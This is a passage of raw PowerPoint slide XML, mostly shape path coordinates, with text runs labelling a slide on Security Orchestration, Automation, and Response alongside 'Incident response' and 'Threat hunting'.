                    <a:pt x="3016774" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508759" y="3017520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1508759"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="3946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320529" y="5221604"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838959">
                  <a:moveTo>
                    <a:pt x="3428" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32410" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59972" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86116" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110840" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134146" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156034" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176503" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213186" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229400" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244196" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257574" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269535" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280077" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289201" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296908" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303198" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308070" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311524" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313562" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313385" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311171" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307540" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302492" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296028" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288147" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278849" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268135" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256005" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242458" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227496" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211117" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193322" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174111" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153485" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131443" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107985" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83112" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56823" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29119" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="7620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250679" y="5757671"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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9539478" y="5945251"/>
            <a:ext cx="18542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237732" y="5183504"/>
            <a:ext cx="762000" cy="1915160"/>
            <a:chOff x="6237732" y="5183504"/>
            <a:chExt cx="762000" cy="1915160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6617223" y="5221604"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838959">
                  <a:moveTo>
                    <a:pt x="310753" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281771" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254209" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228065" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203341" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158147" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137678" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118627" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100995" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84781" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69985" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56607" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44647" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34104" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24980" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17273" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10983" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6641" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11689" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18153" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26034" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35332" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46046" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58176" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71723" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86686" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103064" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120859" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140070" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160696" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182739" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206196" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231070" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257358" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285062" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="7620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237732" y="5757671"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="380999" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380999" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761999" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380999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6526783" y="5945251"/>
            <a:ext cx="18542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411728" y="5949188"/>
            <a:ext cx="25146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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-140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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>response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254233" y="5893053"/>
            <a:ext cx="212026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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-140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 b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hunting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96456" y="5227320"/>
            <a:ext cx="2857500" cy="1837943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2641" y="306451"/>
            <a:ext cx="903160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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Orchestration,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120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automation,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response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69007" y="760476"/>
            <a:ext cx="12528804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695069" y="4679060"/>
            <a:ext cx="12561570" cy="1651635"/>
            <a:chOff x="1695069" y="4679060"/>
            <a:chExt cx="12561570" cy="1651635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1704594" y="5240273"/>
              <a:ext cx="12542520" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
